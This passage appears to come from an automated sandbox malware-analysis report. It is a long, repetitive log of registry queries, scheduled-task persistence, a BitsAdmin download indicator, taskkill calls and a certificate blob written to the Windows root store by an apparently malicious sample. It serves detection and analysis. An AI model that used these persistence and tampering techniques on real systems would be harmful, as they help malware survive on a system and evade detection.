WerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe0kAFG6Gb0qZcLRAssa3HEQSW.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe6044388.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 0kAFG6Gb0qZcLRAssa3HEQSW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 6044388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6044388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 0kAFG6Gb0qZcLRAssa3HEQSW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 0kAFG6Gb0qZcLRAssa3HEQSW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 6044388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 6244 schtasks.exe 4380 schtasks.exe 7016 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 55 IoCs
Processes:
0kAFG6Gb0qZcLRAssa3HEQSW.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exe6044388.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 0kAFG6Gb0qZcLRAssa3HEQSW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 0kAFG6Gb0qZcLRAssa3HEQSW.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 6044388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 6044388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5628 taskkill.exe 1512 taskkill.exe 4520 taskkill.exe 7000 taskkill.exe 2992 taskkill.exe 4720 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exeWaaSMedicAgent.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\02nhqvegptdbnabf svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02jzosqzcpmvmvyz\DeviceId = "<Data LastUpdatedTime=\"1637244804\"><User username=\"02JZOSQZCPMVMVYZ\"/></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\URL = "https://login.live.com" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02jzosqzcpmvmvyz\DeviceId = "<Data LastUpdatedTime=\"1637244804\"><User username=\"02JZOSQZCPMVMVYZ\"><HardwareInfo BoundTime=\"1637244805\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\02uinvflsbxivzcq\Reason = "2147750679" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\"" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02jzosqzcpmvmvyz\Provision Thursday, November 18, 2021 06:13:24 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA5Xc4CNQs90CwFAsbPoLr4AAAAAACAAAAAAAQZgAAAAEAACAAAACTJ8GT9DW9k1G+O3IS7QHIneBxlc4UwzUoSdBYVpeoJQAAAAAOgAAAAAIAACAAAAAPS2AIZJAH3EiKnjDdceqXkR9BKCrrtQ6I3oVlw3w2GiAAAABjrzo5NvzjVeHjTwzaCRWTAwGhsmfKKDv6/dBGZBVvckAAAADPdmlgnTwBGHloG/Y3ZkB0/tVHd4E1gKo0wkMyR1u1s1+deDHeXYChNEdQaFbxk+CKOAHk7Yk01ot/F3+oxbqm" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\02nhqvegptdbnabf\DeviceId = "<Data><User username=\"02NHQVEGPTDBNABF\"><HardwareInfo BoundTime=\"1637244810\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\AppIdList svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02jzosqzcpmvmvyz\DeviceId = "<Data LastUpdatedTime=\"1637244804\"><User username=\"02JZOSQZCPMVMVYZ\"><HardwareInfo BoundTime=\"1637244804\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\Reason = "2147750679" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Data = "ct%3D1637244805%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253ECetD5Touhdl0kFCQejy9vuHcEcpCn%252Beu8wEI6P1LXJjsj9/pfyCh%252Bxyz5wryXdoUipZwOhONGqZ9VK2K9Dv2Rnz7fWHE4MZIy2HSMuLOttm1oUO5z4VHrXiTVepS0WXSIBf6E9lM5psWwANHLQ0Te4Xl8sqZ%252B0/xpPKSF2r1m0H8Ga4krjZw9oa%252BSzV3jH0WyqD9ecAjDWZFjGYl4IOqoyujxs59TAHj7JMVDAeD3p5rLXInEkwlzs%252BzmMFxrfQuoZg4v%252BJpvgLQWBqfQg67o5TVT3raCZEEtSrrTG8pZj5zn%252BqTQjGnkNDQ55rWTUXpO1rHp5VlfwBSMRNUq1VL2pHJjcz9HDcwozzDEjvB/6cCJoQ0Wbg37M9Y1nMO0BAf%252BpRT%252B47ddgrdhX0/DDw1aKIEJ5wE4GLXcheL7hRF8l/AMLSzUtgfTshv%252BgCuiVyPtWKvNSxNMNZGnQ8MUtPRulXckwECHdH8pZzNPO6a7bIo8YrJOfxNwCWz7nCoJE9D/Q%253D%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3DuBcPxwFj88UVxpSAu4%252BfJZov85EKIqje%26hash%3DjadQBM89CoXcBh45IYM2cwJ8atGilRjCcYib1eZ94gE%253D%26dd%3D1; path=/; domain=login.live.com; secure; httponly" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\02nhqvegptdbnabf\DeviceId = "<Data><User username=\"02NHQVEGPTDBNABF\"><HardwareInfo BoundTime=\"1637244809\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02jzosqzcpmvmvyz svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-257790753-2419383948-818201544-1000\ValidDeviceId = "02nhqvegptdbnabf" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC svchost.exe -
Modifies registry class 6 IoCs
Processes:
Conhost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{4C976D9C-3EF1-4B62-837D-9670E74041E7} Conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb